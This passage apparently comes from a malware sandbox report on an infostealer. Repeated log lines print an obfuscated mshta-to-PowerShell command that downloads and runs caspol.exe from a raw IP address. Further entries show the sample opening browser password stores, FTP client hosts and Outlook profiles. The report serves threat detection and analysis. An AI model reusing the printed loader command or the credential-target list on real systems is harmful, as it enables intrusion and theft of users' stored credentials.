zfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaizfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaizfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaizfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\Users\user\AppData\Roaming\caspol.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeQueries volume information: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\caspol.exeQueries volume information: C:\Users\user\AppData\Roaming\caspol.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: caspol.exe PID: 3888, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rrwscqkDSNwLK.exe PID: 3576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: caspol.exe PID: 4076, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000012.00000002.637368812.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: caspol.exe PID: 2596, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
